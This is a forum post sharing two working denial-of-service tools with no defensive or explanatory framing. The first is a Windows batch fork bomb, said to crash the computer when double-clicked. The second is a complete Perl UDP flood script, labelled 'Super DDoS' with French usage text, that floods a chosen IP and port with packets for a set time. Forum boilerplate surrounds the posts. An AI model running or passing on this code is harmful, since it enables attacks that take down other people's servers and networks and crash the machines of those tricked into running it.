Jump to content

Recommended Posts

Posted

Double click it and it will Crash the computer.

@echo off

:a

Start

Start

Start

Start

Start

Start

Start

Start

goto :a

 

ddos perl

 

    #!/usr/bin/perl

   

    ##############

    # udp flood.

    ##############

   

    use Socket;

    use strict;

   

    if ($#ARGV != 3) {

      print " \n";

      print "Super DDoS // by Adrien\n\n";

      print "Commande: flood.pl <ip> <port> <packets> <temps(en secondes)>\n";

      print " port: le port à flood. Mettez 0 pour tous.\n";

      print " packets: le nombre de packets à envoyer. Entre 64 et 1024.\n";

      print " temps: le temps de flood en secondes.\n";

      exit(1);

    }

   

    my ($ip,$port,$size,$time) = @ARGV;

   

    my ($iaddr,$endtime,$psize,$pport);

   

    $iaddr = inet_aton("$ip") or die "Impossible de se connecter à $ip\n";

    $endtime = time() + ($time ? $time : 1000000);

   

    socket(flood, PF_INET, SOCK_DGRAM, 17);

   

   

    print "Flooding en cours sur $ip avec le port " . ($port ? $port : "random") . ", envoit de " .

      ($size ? "$size-byte" : "random size") . " packets" .

      ($time ? " pour $time secondes" : "") . "\n";

    print "Attaque arrêtée avec Ctrl-C\n" unless $time;

   

    for (;time() <= $endtime;) {

      $psize = $size ? $size : int(rand(1500-64)+64) ;

      $pport = $port ? $port : int(rand(65500))+1;

   

      send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...